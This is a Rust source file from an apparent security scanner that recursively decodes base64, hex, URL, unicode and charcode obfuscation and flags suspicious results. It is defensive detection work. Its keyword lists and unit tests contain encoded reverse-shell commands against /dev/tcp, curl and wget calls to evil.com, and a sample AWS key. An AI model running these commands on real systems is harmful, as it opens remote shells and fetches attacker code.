Skip to main content

cc_audit/
deobfuscation.rs

1use base64::Engine;
2use rayon::prelude::*;
3use regex::Regex;
4use std::sync::LazyLock;
5
6/// Deobfuscation engine for deep scanning
7pub struct Deobfuscator;
8
9/// Maximum number of nested decoding layers to unwrap during a deep scan.
10/// Bounds recursion against stacked/self-referential encodings (issue #128).
11const MAX_DECODE_DEPTH: usize = 4;
12
13/// Maximum number of decoded layers to collect across a single deep scan.
14/// Prevents decode-bomb-style blowups on adversarial input.
15const MAX_DECODE_RESULTS: usize = 256;
16
17static BASE64_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
18    // Match both the standard (`+`/`/`) and URL-safe (`-`/`_`) alphabets, with or
19    // without `=` padding. A single run may be standard OR URL-safe; `decode_base64`
20    // tries every engine variant, so an over-broad match is harmless (it just fails
21    // to decode). Length >= 16 keeps the original minimum; the `< 20` guard in
22    // `decode_base64` still filters short candidates.
23    Regex::new(r"[A-Za-z0-9+/_-]{16,}={0,2}").expect("BASE64 regex")
24});
25static HEX_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
26    Regex::new(r"(?:\\x[0-9A-Fa-f]{2}){4,}|(?:0x[0-9A-Fa-f]{2}){4,}").expect("HEX regex")
27});
28static URL_ENCODED_PATTERN: LazyLock<Regex> =
29    LazyLock::new(|| Regex::new(r"(?:%[0-9A-Fa-f]{2}){4,}").expect("URL encoded regex"));
30static UNICODE_ESCAPE_PATTERN: LazyLock<Regex> =
31    LazyLock::new(|| Regex::new(r"(?:\\u[0-9A-Fa-f]{4}){2,}").expect("Unicode escape regex"));
32static CHAR_CODE_PATTERN: LazyLock<Regex> =
33    LazyLock::new(|| Regex::new(r"String\.fromCharCode\s*\([\d,\s]+\)").expect("CharCode regex"));
34
35impl Deobfuscator {
36    pub fn new() -> Self {
37        Self
38    }
39
40    /// Deobfuscate content and return a list of decoded strings (single pass,
41    /// suspicious decodes only).
42    pub fn deobfuscate(&self, content: &str) -> Vec<DecodedContent> {
43        // Early return if no encoded patterns detected
44        if !self.has_encoded_patterns(content) {
45            return Vec::new();
46        }
47
48        // Parallel decode operations using Rayon
49        // Use a Vec of decoder functions that return Vec<DecodedContent>
50        vec![
51            self.decode_base64(content),
52            self.decode_hex(content),
53            self.decode_url(content),
54            self.decode_unicode_escapes(content),
55            self.decode_char_code(content),
56        ]
57        .into_par_iter()
58        .flatten()
59        .collect()
60    }
61
62    /// Single-pass decode of every valid layer, WITHOUT the suspicious filter.
63    ///
64    /// Used by the recursive walker so a non-suspicious intermediate layer can
65    /// still be fed back through the decoders.
66    fn deobfuscate_raw(&self, content: &str) -> Vec<DecodedContent> {
67        if !self.has_encoded_patterns(content) {
68            return Vec::new();
69        }
70
71        vec![
72            self.decode_base64_raw(content),
73            self.decode_hex_raw(content),
74            self.decode_url_raw(content),
75            self.decode_unicode_escapes_raw(content),
76            self.decode_char_code_raw(content),
77        ]
78        .into_par_iter()
79        .flatten()
80        .collect()
81    }
82
83    /// Iteratively decode nested/multi-layer encodings (issue #128).
84    ///
85    /// Each decoded layer is fed back through the decoders up to
86    /// [`MAX_DECODE_DEPTH`] layers. Multi-layer encoding (e.g. Base64 of a
87    /// hex-escaped command) is a standard obfuscation technique that a single
88    /// pass leaves hidden. A visited-set and a [`MAX_DECODE_RESULTS`] cap bound
89    /// the work against decode-bomb / self-referential inputs. Each returned
90    /// layer records its decode chain (e.g. `base64 -> hex`) in `encoding`.
91    fn deobfuscate_recursive(&self, content: &str) -> Vec<DecodedContent> {
92        let mut out = Vec::new();
93        let mut visited: std::collections::HashSet<String> = std::collections::HashSet::new();
94        let mut stack: Vec<(String, String, usize)> = self
95            .deobfuscate_raw(content)
96            .into_iter()
97            .map(|d| (d.decoded, d.encoding, 1usize))
98            .collect();
99
100        while let Some((text, chain, depth)) = stack.pop() {
101            if out.len() >= MAX_DECODE_RESULTS {
102                break;
103            }
104            // Skip layers already seen to avoid loops and redundant work.
105            if !visited.insert(text.clone()) {
106                continue;
107            }
108
109            // Feed this layer back through the decoders before consuming `text`.
110            if depth < MAX_DECODE_DEPTH {
111                for d in self.deobfuscate_raw(&text) {
112                    stack.push((d.decoded, format!("{} -> {}", chain, d.encoding), depth + 1));
113                }
114            }
115
116            out.push(DecodedContent {
117                original: content.chars().take(120).collect(),
118                decoded: text,
119                encoding: chain,
120            });
121        }
122
123        out
124    }
125
126    /// Check if content contains encoded patterns
127    fn has_encoded_patterns(&self, content: &str) -> bool {
128        // Use regex patterns for more accurate detection
129        BASE64_PATTERN.is_match(content)
130            || HEX_PATTERN.is_match(content)
131            || URL_ENCODED_PATTERN.is_match(content)
132            || UNICODE_ESCAPE_PATTERN.is_match(content)
133            || CHAR_CODE_PATTERN.is_match(content)
134    }
135
136    /// Keep only the decoded layers whose content looks suspicious.
137    ///
138    /// The public `decode_*` methods apply this so a single pass does not surface
139    /// benign decodes. The recursive walker instead works on the unfiltered
140    /// `decode_*_raw` output so a non-suspicious *intermediate* layer (e.g. a
141    /// hex-escaped string) is still fed back through the decoders (issue #128).
142    fn filter_suspicious(&self, items: Vec<DecodedContent>) -> Vec<DecodedContent> {
143        items
144            .into_iter()
145            .filter(|d| self.is_suspicious(&d.decoded))
146            .collect()
147    }
148
149    /// Decode base64 encoded strings (only suspicious decodes).
150    fn decode_base64(&self, content: &str) -> Vec<DecodedContent> {
151        self.filter_suspicious(self.decode_base64_raw(content))
152    }
153
154    /// Decode every valid-UTF-8 base64 run, without the suspicious filter.
155    fn decode_base64_raw(&self, content: &str) -> Vec<DecodedContent> {
156        let mut results = Vec::new();
157
158        for cap in BASE64_PATTERN.find_iter(content) {
159            let encoded = cap.as_str();
160            // Skip if too short or looks like random text
161            if encoded.len() < 20 {
162                continue;
163            }
164
165            if let Some(decoded_str) = Self::try_decode_base64_variants(encoded) {
166                results.push(DecodedContent {
167                    original: encoded.to_string(),
168                    decoded: decoded_str,
169                    encoding: "base64".to_string(),
170                });
171            }
172        }
173
174        results
175    }
176
177    /// Try decoding a Base64 candidate with every common engine variant and
178    /// return the first result that is valid UTF-8.
179    ///
180    /// Covers standard and URL-safe alphabets, padded and unpadded. The `base64`
181    /// crate rejects the "wrong" alphabet and mismatched padding, so a payload
182    /// using URL-safe or unpadded Base64 (both ubiquitous) would otherwise be
183    /// silently dropped even though the standard-padded form is decoded.
184    fn try_decode_base64_variants(encoded: &str) -> Option<String> {
185        use base64::engine::general_purpose::{
186            STANDARD, STANDARD_NO_PAD, URL_SAFE, URL_SAFE_NO_PAD,
187        };
188
189        let engines: [&base64::engine::GeneralPurpose; 4] =
190            [&STANDARD, &STANDARD_NO_PAD, &URL_SAFE, &URL_SAFE_NO_PAD];
191
192        engines
193            .iter()
194            .filter_map(|engine| engine.decode(encoded).ok())
195            .find_map(|bytes| String::from_utf8(bytes).ok())
196    }
197
198    /// Decode hex encoded strings (only suspicious decodes).
199    fn decode_hex(&self, content: &str) -> Vec<DecodedContent> {
200        self.filter_suspicious(self.decode_hex_raw(content))
201    }
202
203    /// Decode every valid-UTF-8 hex run (\\x or 0x format), unfiltered.
204    fn decode_hex_raw(&self, content: &str) -> Vec<DecodedContent> {
205        let mut results = Vec::new();
206
207        for cap in HEX_PATTERN.find_iter(content) {
208            let encoded = cap.as_str();
209
210            // Extract hex bytes
211            let hex_bytes: Vec<u8> = if encoded.starts_with("\\x") {
212                encoded
213                    .split("\\x")
214                    .filter(|s| !s.is_empty())
215                    .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
216                    .collect()
217            } else {
218                // 0x format
219                encoded
220                    .split("0x")
221                    .filter(|s| !s.is_empty())
222                    .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
223                    .collect()
224            };
225
226            if let Ok(decoded_str) = String::from_utf8(hex_bytes) {
227                results.push(DecodedContent {
228                    original: encoded.to_string(),
229                    decoded: decoded_str,
230                    encoding: "hex".to_string(),
231                });
232            }
233        }
234
235        results
236    }
237
238    /// Decode URL encoded strings (only suspicious decodes).
239    fn decode_url(&self, content: &str) -> Vec<DecodedContent> {
240        self.filter_suspicious(self.decode_url_raw(content))
241    }
242
243    /// Decode every valid-UTF-8 URL-encoded run, unfiltered.
244    fn decode_url_raw(&self, content: &str) -> Vec<DecodedContent> {
245        let mut results = Vec::new();
246
247        for cap in URL_ENCODED_PATTERN.find_iter(content) {
248            let encoded = cap.as_str();
249
250            // Manual URL decoding
251            let mut decoded_bytes = Vec::new();
252            let mut chars = encoded.chars().peekable();
253
254            while let Some(c) = chars.next() {
255                if c == '%' {
256                    let hex: String = chars.by_ref().take(2).collect();
257                    if let Ok(byte) = u8::from_str_radix(&hex, 16) {
258                        decoded_bytes.push(byte);
259                    }
260                } else {
261                    decoded_bytes.push(c as u8);
262                }
263            }
264
265            if let Ok(decoded_str) = String::from_utf8(decoded_bytes) {
266                results.push(DecodedContent {
267                    original: encoded.to_string(),
268                    decoded: decoded_str,
269                    encoding: "url".to_string(),
270                });
271            }
272        }
273
274        results
275    }
276
277    /// Decode unicode escape sequences (only suspicious decodes).
278    fn decode_unicode_escapes(&self, content: &str) -> Vec<DecodedContent> {
279        self.filter_suspicious(self.decode_unicode_escapes_raw(content))
280    }
281
282    /// Decode every unicode-escape run (\\uXXXX), unfiltered.
283    fn decode_unicode_escapes_raw(&self, content: &str) -> Vec<DecodedContent> {
284        let mut results = Vec::new();
285
286        for cap in UNICODE_ESCAPE_PATTERN.find_iter(content) {
287            let encoded = cap.as_str();
288            let mut decoded = String::new();
289
290            let mut chars = encoded.chars().peekable();
291            while let Some(c) = chars.next() {
292                if c == '\\' && chars.peek() == Some(&'u') {
293                    chars.next(); // consume 'u'
294                    let hex: String = chars.by_ref().take(4).collect();
295                    if let Ok(code_point) = u32::from_str_radix(&hex, 16)
296                        && let Some(ch) = char::from_u32(code_point)
297                    {
298                        decoded.push(ch);
299                    }
300                } else {
301                    decoded.push(c);
302                }
303            }
304
305            results.push(DecodedContent {
306                original: encoded.to_string(),
307                decoded,
308                encoding: "unicode".to_string(),
309            });
310        }
311
312        results
313    }
314
315    /// Decode JavaScript String.fromCharCode patterns (only suspicious decodes).
316    fn decode_char_code(&self, content: &str) -> Vec<DecodedContent> {
317        self.filter_suspicious(self.decode_char_code_raw(content))
318    }
319
320    /// Decode every String.fromCharCode run, unfiltered.
321    fn decode_char_code_raw(&self, content: &str) -> Vec<DecodedContent> {
322        let mut results = Vec::new();
323
324        for cap in CHAR_CODE_PATTERN.find_iter(content) {
325            let encoded = cap.as_str();
326
327            // Extract numbers from the pattern
328            let numbers: Vec<u32> = encoded
329                .split(|c: char| !c.is_ascii_digit())
330                .filter(|s| !s.is_empty())
331                .filter_map(|s| s.parse().ok())
332                .collect();
333
334            let decoded: String = numbers.iter().filter_map(|&n| char::from_u32(n)).collect();
335
336            results.push(DecodedContent {
337                original: encoded.to_string(),
338                decoded,
339                encoding: "charcode".to_string(),
340            });
341        }
342
343        results
344    }
345
346    /// Check if decoded content looks suspicious
347    fn is_suspicious(&self, content: &str) -> bool {
348        let suspicious_patterns = [
349            "eval",
350            "exec",
351            "bash",
352            "sh -c",
353            "/bin/",
354            "curl ",
355            "wget ",
356            "nc ",
357            "netcat",
358            "/dev/tcp",
359            "/dev/udp",
360            "base64 -d",
361            "python -c",
362            "ruby -e",
363            "perl -e",
364            "powershell",
365            "cmd.exe",
366            "rm -rf",
367            "chmod ",
368            "sudo ",
369            "password",
370            "secret",
371            "api_key",
372            "token",
373            "credential",
374            "http://",
375            "https://",
376            "ftp://",
377        ];
378
379        let content_lower = content.to_lowercase();
380        suspicious_patterns
381            .iter()
382            .any(|p| content_lower.contains(p))
383    }
384
385    /// Deep scan content - deobfuscate and return all findings
386    pub fn deep_scan(&self, content: &str, file_path: &str) -> Vec<crate::rules::Finding> {
387        use crate::engine::scanner::ScannerConfig;
388
389        let mut findings = Vec::new();
390        let config = ScannerConfig::new();
391
392        // First scan original content
393        findings.extend(config.check_content(content, file_path));
394
395        // Then scan every decoded layer, unwrapping nested encodings so a
396        // multi-layer payload cannot hide behind one decoding pass (issue #128).
397        for decoded in self.deobfuscate_recursive(content) {
398            let context = format!("{}:decoded:{}", file_path, decoded.encoding);
399
400            // Create findings for deobfuscated content
401            for mut finding in config.check_content(&decoded.decoded, &context) {
402                // Add note about deobfuscation
403                finding.message = format!(
404                    "{} [Decoded from {} encoded content]",
405                    finding.message, decoded.encoding
406                );
407                findings.push(finding);
408            }
409
410            // Also check for suspicious decoded content itself
411            if decoded.decoded.len() > 10 && self.is_highly_suspicious(&decoded.decoded) {
412                findings.push(crate::rules::Finding {
413                    id: "OB-DEEP-001".to_string(),
414                    severity: crate::rules::Severity::High,
415                    category: crate::rules::Category::Obfuscation,
416                    confidence: crate::rules::Confidence::Firm,
417                    name: "Obfuscated suspicious content".to_string(),
418                    location: crate::rules::Location {
419                        file: file_path.to_string(),
420                        line: 0,
421                        column: None,
422                    },
423                    code: decoded.original.chars().take(100).collect::<String>() + "...",
424                    message: format!(
425                        "Found {} encoded content that decodes to suspicious payload",
426                        decoded.encoding
427                    ),
428                    recommendation: "Review the decoded content for malicious commands or URLs"
429                        .to_string(),
430                    fix_hint: None,
431                    cwe_ids: vec!["CWE-116".to_string()],
432                    rule_severity: None,
433                    client: None,
434                    context: None,
435                });
436            }
437        }
438
439        findings
440    }
441
442    /// Check if content is highly suspicious (more specific than is_suspicious)
443    fn is_highly_suspicious(&self, content: &str) -> bool {
444        let highly_suspicious = [
445            "bash -i",
446            "/dev/tcp/",
447            "nc -e",
448            "rm -rf /",
449            "curl | bash",
450            "wget | sh",
451            "eval(base64",
452            "exec(decode",
453        ];
454
455        let content_lower = content.to_lowercase();
456        highly_suspicious.iter().any(|p| content_lower.contains(p))
457    }
458}
459
460impl Default for Deobfuscator {
461    fn default() -> Self {
462        Self::new()
463    }
464}
465
466/// Represents decoded content from obfuscation
467#[derive(Debug, Clone)]
468pub struct DecodedContent {
469    pub original: String,
470    pub decoded: String,
471    pub encoding: String,
472}
473
474#[cfg(test)]
475mod tests {
476    use super::*;
477
478    #[test]
479    fn test_decode_base64() {
480        let deob = Deobfuscator::new();
481        // "curl http://evil.com" in base64
482        let content = "Y3VybCBodHRwOi8vZXZpbC5jb20=";
483        let results = deob.decode_base64(content);
484        assert!(!results.is_empty());
485        assert!(results[0].decoded.contains("curl"));
486    }
487
488    #[test]
489    fn test_decode_hex() {
490        let deob = Deobfuscator::new();
491        // "curl" in hex
492        let content = r"\x63\x75\x72\x6c\x20\x68\x74\x74\x70";
493        let results = deob.decode_hex(content);
494        assert!(!results.is_empty());
495        assert!(results[0].decoded.contains("curl"));
496    }
497
498    #[test]
499    fn test_decode_url() {
500        let deob = Deobfuscator::new();
501        // "curl http" URL encoded
502        let content = "%63%75%72%6c%20%68%74%74%70";
503        let results = deob.decode_url(content);
504        assert!(!results.is_empty());
505        assert!(results[0].decoded.contains("curl"));
506    }
507
508    #[test]
509    fn test_decode_charcode() {
510        let deob = Deobfuscator::new();
511        // String.fromCharCode for "eval"
512        let content = "String.fromCharCode(101,118,97,108)";
513        let results = deob.decode_char_code(content);
514        assert!(!results.is_empty());
515        assert!(results[0].decoded.contains("eval"));
516    }
517
518    #[test]
519    fn test_is_suspicious() {
520        let deob = Deobfuscator::new();
521        assert!(deob.is_suspicious("curl http://example.com"));
522        assert!(deob.is_suspicious("bash -c 'evil command'"));
523        assert!(deob.is_suspicious("password=secret123"));
524        assert!(!deob.is_suspicious("hello world"));
525    }
526
527    #[test]
528    fn test_deep_scan() {
529        let deob = Deobfuscator::new();
530        // Content with highly suspicious obfuscated payload: "bash -i >& /dev/tcp/x"
531        // Base64 for "bash -i >& /dev/tcp/evil.com/1234"
532        let content = "normal text\nYmFzaCAtaSA+JiAvZGV2L3RjcC9ldmlsLmNvbS8xMjM0 # hidden payload";
533        let findings = deob.deep_scan(content, "test.sh");
534        // Should find OB-DEEP-001 for highly suspicious decoded content
535        assert!(
536            findings
537                .iter()
538                .any(|f| f.id == "OB-DEEP-001" || f.message.contains("Decoded"))
539        );
540    }
541
542    #[test]
543    fn test_deep_scan_multi_layer_base64_of_hex() {
544        // Multi-layer obfuscation: a reverse-shell command is hex-escaped, then
545        // the hex-escaped string is Base64-encoded. A single decoding pass only
546        // reveals the (non-suspicious) hex-escaped layer; the real command stays
547        // hidden. Deep scan must iterate layers (issue #128).
548        let deob = Deobfuscator::new();
549        let cmd = "bash -i >& /dev/tcp/1.2.3.4/4444 0>&1";
550        let hex_escaped: String = cmd.bytes().map(|b| format!("\\x{:02x}", b)).collect();
551        let outer = base64::engine::general_purpose::STANDARD.encode(hex_escaped.as_bytes());
552        let content = format!("echo {} | sh", outer);
553
554        let findings = deob.deep_scan(&content, "payload.sh");
555        assert!(
556            findings.iter().any(|f| f.id == "OB-DEEP-001"),
557            "nested base64(hex(command)) must be decoded and flagged"
558        );
559    }
560
561    #[test]
562    fn test_deep_scan_detects_base64_wrapped_aws_key() {
563        // Regression for #146: a secret hidden inside a Base64 blob must still be
564        // caught. Before the deep-scan pre-filter fix, the encoded layer was
565        // dropped before the rule engine saw it, so SL-001 never fired.
566        let deob = Deobfuscator::new();
567        let secret = "aws_access_key_id=AKIAIOSFODNN7ABCDEFG";
568        let encoded = base64::engine::general_purpose::STANDARD.encode(secret.as_bytes());
569        let content = format!("export CREDS={encoded}");
570
571        let findings = deob.deep_scan(&content, "config.sh");
572        assert!(
573            findings.iter().any(|f| f.id == "SL-001"),
574            "Base64-wrapped AWS access key must be decoded and flagged as SL-001"
575        );
576    }
577
578    #[test]
579    fn test_deep_scan_detects_base64_wrapped_private_key() {
580        // Regression for #146: a PEM private-key header wrapped in Base64 must be
581        // decoded and flagged (SL-005), not silently dropped.
582        let deob = Deobfuscator::new();
583        let secret = "-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEA\n";
584        let encoded = base64::engine::general_purpose::STANDARD.encode(secret.as_bytes());
585        let content = format!("blob = \"{encoded}\"");
586
587        let findings = deob.deep_scan(&content, "notes.md");
588        assert!(
589            findings.iter().any(|f| f.id == "SL-005"),
590            "Base64-wrapped private key header must be decoded and flagged as SL-005"
591        );
592    }
593
594    #[test]
595    fn test_deep_scan_single_layer_still_benign() {
596        // A plain, non-encoded benign line must not produce deep-scan findings
597        // even with recursive decoding enabled.
598        let deob = Deobfuscator::new();
599        let findings = deob.deep_scan("echo hello world", "safe.sh");
600        assert!(
601            !findings.iter().any(|f| f.id == "OB-DEEP-001"),
602            "benign content must not be flagged"
603        );
604    }
605
606    #[test]
607    fn test_deobfuscate_empty() {
608        let deob = Deobfuscator::new();
609        let results = deob.deobfuscate("normal text without obfuscation");
610        assert!(results.is_empty());
611    }
612
613    #[test]
614    fn test_default_trait() {
615        let deob = Deobfuscator;
616        assert!(!deob.is_suspicious("hello"));
617    }
618
619    #[test]
620    fn test_decode_unicode_escapes() {
621        let deob = Deobfuscator::new();
622        // "eval" in unicode escapes
623        let content = r"\u0065\u0076\u0061\u006c";
624        let results = deob.decode_unicode_escapes(content);
625        assert!(!results.is_empty());
626        assert!(results[0].decoded.contains("eval"));
627    }
628
629    #[test]
630    fn test_decode_base64_short_string() {
631        let deob = Deobfuscator::new();
632        // Short base64 string (less than 20 chars) should be skipped
633        let content = "YWJjZA=="; // "abcd" in base64
634        let results = deob.decode_base64(content);
635        assert!(results.is_empty());
636    }
637
638    #[test]
639    fn test_decode_base64_non_suspicious() {
640        let deob = Deobfuscator::new();
641        // Long base64 but decodes to non-suspicious content
642        let content = "dGhpcyBpcyBhIG5vcm1hbCBzYWZlIHRleHQ="; // "this is a normal safe text"
643        let results = deob.decode_base64(content);
644        assert!(results.is_empty());
645    }
646
647    #[test]
648    fn test_decode_base64_unpadded_standard() {
649        let deob = Deobfuscator::new();
650        // "curl http://evil.com" standard base64 with the trailing '=' padding
651        // stripped. STANDARD.decode rejects this (InvalidPadding), and the regex
652        // only matches a 24-char (aligned) prefix, so the FULL payload is never
653        // recovered — assert full equality, not a substring, to expose the gap.
654        let content = "Y3VybCBodHRwOi8vZXZpbC5jb20";
655        let results = deob.decode_base64(content);
656        assert!(
657            results.iter().any(|r| r.decoded == "curl http://evil.com"),
658            "unpadded standard base64 should decode to the full payload, got: {:?}",
659            results.iter().map(|r| &r.decoded).collect::<Vec<_>>()
660        );
661    }
662
663    #[test]
664    fn test_decode_base64_url_safe() {
665        let deob = Deobfuscator::new();
666        // "wget http://evil.com/xyz??? > /tmp/p" in URL-safe base64 (unpadded).
667        // Contains '_' (URL-safe alphabet). The standard alphabet regex matches
668        // only the run before '_' and STANDARD.decode rejects the URL-safe
669        // alphabet, so the full payload is never recovered — assert equality.
670        let content = "d2dldCBodHRwOi8vZXZpbC5jb20veHl6Pz8_ID4gL3RtcC9w";
671        let results = deob.decode_base64(content);
672        assert!(
673            results
674                .iter()
675                .any(|r| r.decoded == "wget http://evil.com/xyz??? > /tmp/p"),
676            "URL-safe base64 should decode to the full payload, got: {:?}",
677            results.iter().map(|r| &r.decoded).collect::<Vec<_>>()
678        );
679    }
680
681    #[test]
682    fn test_decode_hex_0x_format() {
683        let deob = Deobfuscator::new();
684        // "curl" in 0x format
685        let content = "0x630x750x720x6c0x200x680x740x740x70";
686        let results = deob.decode_hex(content);
687        assert!(!results.is_empty());
688        assert!(results[0].decoded.contains("curl"));
689    }
690
691    #[test]
692    fn test_is_highly_suspicious() {
693        let deob = Deobfuscator::new();
694        assert!(deob.is_highly_suspicious("bash -i >& /dev/tcp/"));
695        assert!(deob.is_highly_suspicious("rm -rf /"));
696        assert!(deob.is_highly_suspicious("curl | bash something"));
697        assert!(deob.is_highly_suspicious("wget | sh something"));
698        assert!(deob.is_highly_suspicious("nc -e /bin/bash"));
699        assert!(deob.is_highly_suspicious("eval(base64"));
700        assert!(deob.is_highly_suspicious("exec(decode"));
701        assert!(!deob.is_highly_suspicious("echo hello"));
702    }
703
704    #[test]
705    fn test_deobfuscate_with_base64() {
706        let deob = Deobfuscator::new();
707        // Contains suspicious base64
708        let content = "command=Y3VybCBodHRwOi8vZXZpbC5jb20="; // "curl http://evil.com"
709        let results = deob.deobfuscate(content);
710        assert!(!results.is_empty());
711    }
712
713    #[test]
714    fn test_deobfuscate_multiple_encodings() {
715        let deob = Deobfuscator::new();
716        // Content with both hex and base64
717        let content =
718            r"data=Y3VybCBodHRwOi8vZXZpbC5jb20=; exec \x63\x75\x72\x6c\x20\x68\x74\x74\x70";
719        let results = deob.deobfuscate(content);
720        // Should find results from both decoders
721        assert!(!results.is_empty());
722    }
723
724    #[test]
725    fn test_deep_scan_clean_content() {
726        let deob = Deobfuscator::new();
727        let content = "normal clean content without any issues";
728        let findings = deob.deep_scan(content, "test.txt");
729        // Should have no findings for clean content
730        assert!(findings.is_empty());
731    }
732
733    #[test]
734    fn test_deep_scan_with_suspicious_decoded() {
735        let deob = Deobfuscator::new();
736        // Content with moderately suspicious base64 (triggers is_suspicious but not is_highly_suspicious)
737        let content = "payload=Y3VybCBodHRwOi8vZXhhbXBsZS5jb20vZG93bmxvYWQuc2g="; // "curl http://example.com/download.sh"
738        let findings = deob.deep_scan(content, "test.sh");
739        // May or may not have findings depending on scanner rules
740        // Just verify no panic
741        let _ = findings;
742    }
743
744    #[test]
745    fn test_decoded_content_debug_trait() {
746        let content = DecodedContent {
747            original: "abc".to_string(),
748            decoded: "xyz".to_string(),
749            encoding: "base64".to_string(),
750        };
751        let debug_str = format!("{:?}", content);
752        assert!(debug_str.contains("DecodedContent"));
753        assert!(debug_str.contains("abc"));
754    }
755
756    #[test]
757    fn test_decoded_content_clone_trait() {
758        let content = DecodedContent {
759            original: "abc".to_string(),
760            decoded: "xyz".to_string(),
761            encoding: "base64".to_string(),
762        };
763        let cloned = content.clone();
764        assert_eq!(content.original, cloned.original);
765        assert_eq!(content.decoded, cloned.decoded);
766        assert_eq!(content.encoding, cloned.encoding);
767    }
768
769    #[test]
770    fn test_is_suspicious_various_patterns() {
771        let deob = Deobfuscator::new();
772        assert!(deob.is_suspicious("wget http://evil.com"));
773        assert!(deob.is_suspicious("nc -l 1234"));
774        assert!(deob.is_suspicious("netcat connection"));
775        assert!(deob.is_suspicious("/dev/tcp/evil"));
776        assert!(deob.is_suspicious("/dev/udp/evil"));
777        assert!(deob.is_suspicious("base64 -d | bash"));
778        assert!(deob.is_suspicious("python -c 'import os'"));
779        assert!(deob.is_suspicious("ruby -e 'exec'"));
780        assert!(deob.is_suspicious("perl -e 'system'"));
781        assert!(deob.is_suspicious("powershell.exe"));
782        assert!(deob.is_suspicious("cmd.exe /c"));
783        assert!(deob.is_suspicious("rm -rf /tmp"));
784        assert!(deob.is_suspicious("chmod 777 file"));
785        assert!(deob.is_suspicious("sudo rm"));
786        assert!(deob.is_suspicious("api_key=secret"));
787        assert!(deob.is_suspicious("token=abc123"));
788        assert!(deob.is_suspicious("credential_store"));
789        assert!(deob.is_suspicious("ftp://server"));
790    }
791
792    #[test]
793    fn test_decode_url_non_suspicious() {
794        let deob = Deobfuscator::new();
795        // URL encoded "hello world" (non-suspicious)
796        let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64";
797        let results = deob.decode_url(content);
798        // Should be empty because "hello world" is not suspicious
799        assert!(results.is_empty());
800    }
801
802    #[test]
803    fn test_decode_hex_non_suspicious() {
804        let deob = Deobfuscator::new();
805        // "hello" in hex - not suspicious
806        let content = r"\x68\x65\x6c\x6c\x6f";
807        let results = deob.decode_hex(content);
808        assert!(results.is_empty());
809    }
810
811    #[test]
812    fn test_decode_charcode_non_suspicious() {
813        let deob = Deobfuscator::new();
814        // "hello" in charCode - not suspicious
815        let content = "String.fromCharCode(104,101,108,108,111)";
816        let results = deob.decode_char_code(content);
817        assert!(results.is_empty());
818    }
819
820    #[test]
821    fn test_decode_unicode_non_suspicious() {
822        let deob = Deobfuscator::new();
823        // "ab" in unicode - not suspicious
824        let content = r"\u0061\u0062";
825        let results = deob.decode_unicode_escapes(content);
826        assert!(results.is_empty());
827    }
828
829    #[test]
830    fn test_deep_scan_original_content_finding() {
831        let deob = Deobfuscator::new();
832        // Content that triggers a rule via check_content
833        // Using sudo which should trigger PE-001
834        let content = "sudo rm -rf /important/files";
835        let findings = deob.deep_scan(content, "script.sh");
836        // Should find findings for sudo usage
837        assert!(!findings.is_empty());
838    }
839
840    #[test]
841    fn test_deobfuscate_with_url_encoding() {
842        let deob = Deobfuscator::new();
843        // URL encoded "curl http://evil.com" with mixed encoded/non-encoded characters
844        let content = "command=%63%75%72%6c%20http://evil.com";
845        let results = deob.deobfuscate(content);
846        // Should find URL-encoded suspicious content
847        assert!(results.iter().any(|r| r.encoding == "url"));
848    }
849
850    #[test]
851    fn test_deobfuscate_with_unicode_escapes() {
852        let deob = Deobfuscator::new();
853        // Unicode escape encoded "curl http"
854        let content = r"var cmd = '\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070'";
855        let results = deob.deobfuscate(content);
856        // Should find unicode-encoded suspicious content
857        assert!(results.iter().any(|r| r.encoding == "unicode"));
858    }
859
860    #[test]
861    fn test_deobfuscate_with_charcode() {
862        let deob = Deobfuscator::new();
863        // String.fromCharCode for "curl http"
864        let content = "var x = String.fromCharCode(99,117,114,108,32,104,116,116,112)";
865        let results = deob.deobfuscate(content);
866        // Should find charcode-encoded suspicious content
867        assert!(results.iter().any(|r| r.encoding == "charcode"));
868    }
869
870    #[test]
871    fn test_url_decode_with_only_percent_encoded() {
872        let deob = Deobfuscator::new();
873        // URL with only percent-encoded characters (matches pattern (?:%[0-9A-Fa-f]{2}){4,})
874        // "curl http" fully percent-encoded
875        let content = "%63%75%72%6c%20%68%74%74%70%3a%2f%2f";
876        let results = deob.decode_url(content);
877        // Should decode correctly
878        assert!(!results.is_empty());
879        assert!(results[0].decoded.contains("curl"));
880        assert!(results[0].decoded.contains("http"));
881    }
882
883    #[test]
884    fn test_unicode_decode_multiple_escapes() {
885        let deob = Deobfuscator::new();
886        // Multiple consecutive unicode escapes (matches pattern (?:\\u[0-9A-Fa-f]{4}){2,})
887        // "curl" in unicode escapes
888        let content = r"\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070";
889        let results = deob.decode_unicode_escapes(content);
890        // Should decode correctly
891        assert!(!results.is_empty());
892        assert!(results[0].decoded.contains("curl"));
893    }
894
895    #[test]
896    fn test_deobfuscate_all_encodings_combined() {
897        let deob = Deobfuscator::new();
898        // Content containing URL, unicode, charcode, hex, and base64 encodings
899        let content = r#"
900            url=%63%75%72%6c%20http
901            unicode=\u0065\u0076\u0061\u006c
902            charcode=String.fromCharCode(99,117,114,108)
903            hex=\x63\x75\x72\x6c\x20\x68\x74\x74\x70
904            base64=Y3VybCBodHRwOi8vZXZpbC5jb20=
905        "#;
906        let results = deob.deobfuscate(content);
907        // Should find multiple encodings
908        assert!(!results.is_empty());
909    }
910
911    #[test]
912    fn test_deep_scan_with_deobfuscated_rule_match() {
913        let deob = Deobfuscator::new();
914        // Base64 encoded content that contains sudo command
915        // "sudo rm -rf /" in base64
916        let base64_content = "c3VkbyBybSAtcmYgLw==";
917        let content = format!("execute={}", base64_content);
918        let findings = deob.deep_scan(&content, "test.sh");
919        // Should find findings from both original scan and decoded content
920        // The decoded content "sudo rm -rf /" should trigger PE-001
921        let has_decoded_finding = findings
922            .iter()
923            .any(|f| f.message.contains("Decoded") || f.id.contains("OB-DEEP"));
924        // Either finds decoded content or the original encoding pattern
925        assert!(has_decoded_finding || !findings.is_empty());
926    }
927
928    #[test]
929    fn test_url_decode_mixed_with_normal_chars() {
930        let deob = Deobfuscator::new();
931        // URL with mixed encoded and normal characters that decode to suspicious content
932        // %63%75%72%6c = "curl", mixed with normal "http"
